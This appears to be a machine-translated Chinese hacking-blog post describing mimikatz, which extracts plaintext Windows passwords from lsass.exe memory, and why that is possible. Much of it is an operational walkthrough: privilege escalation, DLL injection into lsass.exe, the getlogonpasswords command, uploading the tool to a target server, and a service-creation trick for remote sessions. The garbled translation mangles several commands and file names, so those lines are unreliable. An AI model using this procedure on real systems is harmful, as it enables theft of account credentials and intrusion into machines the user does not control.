Lightweight debugger-mimikatz-directly captures windows plaintext passwords!

Yesterday, a friend sent an artifact written by a French hacker called mimikatz.
Let's take a look

Artifacts:

Http://blog.gentilkiwi.com/mimikatz

There is also an article that uses this artifact to directly obtain Windows Active account plaintext password from lsass.exe

Http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

I tried to test it with win2008 R2 x64.

Wdigest is my plaintext password.

I have also tested that the password complexity is more than 14 characters.

Password that contains uppercase/lowercase letters and special characters

You can also capture the plaintext password.

Wce.exe or
Lslsass.exe can only capture at most active accounts from the memory.
Lm hash and NTLM hash

However, after the plaintext password is captured

From this, we can infer that in lsass.exe
Not only lm hash and
NTLM hash

There should still be some Encryption Algorithm for your plaintext Password
(Note: the encryption algorithm is not the hash algorithm. The reversible hash algorithm is irreversible)

In this way, the encryption algorithm is reversible and can be decrypted to the plaintext.

Therefore,
Sekurlsa. dll should contain the corresponding decryption algorithm

If you have a good background in reverse engineering, you can try reverse analysis.

Then, the functionality of this artifact is certainly more like a lightweight Debugger in my opinion.

It can improve the process permission and inject the process to read the process memory.

The following is an example of reading the memory of a mine clearance game.

We can also use the pause command to suspend the process. At this time, the game time will be static.

In short, this artifact is quite gorgeous and has more capabilities to be tapped into by hackers =... = ~

Webmaster comment:

Capture the plaintext password of the user in lsass.exe:

// Privilege Escalation privilege: Debug // inject dllinject: Process lsass.exe sekurlsa. dll // capture the password @ getlogonpasswords

Tested, kill:

Windows XP (partially)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

It seems that only Windows 2000 is unavailable, and Windows XP is supported at least.

However, 2000/XP can use the previous findpassword, Windows 2003-Windows 7 Microsoft's processing mechanism has not changed.

The domain can also be used. Theoretically, it is okay. If you have logged on to lsass.exe, all of them are in lsass.exe.

The principle is that the password entered during login is encrypted after being called by the wdigest and tspkg modules in lsass.exe,There is no erasure, And the encryption can be located through features, and is reversible according to Microsoft's algorithm.

Once you log on, you can capture it and enumerate it. It's all Microsoft's fault.

To put it simply, in windows, when a user crashes, lsass.exe uses a reversible algorithm to encrypt the plaintext password, and stores the password in the memory, which is not cleaned up. Then, it can be captured and restored.

That is, after the instance is started,As long as the user has logged on, it can be captured before the restart (because the memory is cleared after the restart, this does not include using other methods to clear the memory), and logout is useless, because the password in the memory is not cleared, So we can still capture it.

I think Microsoft may issue a patch to clear this piece ......

There are many other functions of this plug-in. Let's look at the parameters. For example, ts is the terminal that calls mimikatz. sys to hide the login.

This should be regarded as password leakage and a very serious vulnerability. It is estimated that Microsoft will issue a patch.

3:10:48 supplement:

See the snow has been detailed analysis of the principles of the post, and is still updated, address: http://bbs.pediy.com/showthread.php? T = 146884

How to capture a password in a remote terminal (338920.mstsc.exe) or a virtual desktop:

Generally, when you run this program on a remote terminal, the system prompts: the storage space is insufficient and the command cannot be processed.

This is because in terminal mode, the remote thread cannot be inserted and cross-session cannot be injected. You need to execute the program using the following method:

First, extract several files. If you only capture the password, you only need these files:

Mimikatz_trunk \ tools \ export xec.exe
Mimikatz_trunk \ Win32 \ mimikatz.exe
Mimikatz_trunk \ Win32 \ sekurlsa. dll

Upload the package to the target server, decompress it, and release it. Note that the path cannot contain Chinese characters (spaces are allowed )! Otherwise, an error will be reported during DLL loading: the file cannot be found.

Use any of the following methods to capture the password:

// The simplest and most practical method is to start with cmdxec.exe. // Run cmd.exe in the system account, or run mimikatz.exe cmdxec-s cmd.exe // start mimimikatz.exe c: \ mimikatz_trunk \ Win32 \ mimikatz.exe // upgrade the permission privilege :: debug // inject DLL. Use the absolute path! And the path cannot contain Chinese characters (spaces are allowed )! Inject: Process lsass.exe "C: \ mimikatz_trunk \ Win32 \ sekurlsa. DLL "// capture the password @ getlogonpasswords // exit, do not use Ctrl + C, it will cause mimikatz.exe CPU usage to reach 100%, an endless loop. Exit //************************************* ******************* // use at to start ***//********* **************************************** * ******* // service creation method SC create GetPassword binpath = "cmd.exe/C: \ XXX \ mimikatz.exe <command.txt> password.txt "SC start getpasswordsc Delete GetPassword //************************ * ****************************** // telnet a remote command pipeline Telnet ****

Some content is transferred from: http://hi.baidu.com/hackercasper/blog/item/b080dbd05eb6a5cc562c8461.html

In this article, "lightweight debugger-mimikatz-directly captures windows plaintext passwords !", From: nuclear' ATK Network Security Research Center, this article address: http://lcx.cc /? I = 2265. For more information, see author and source!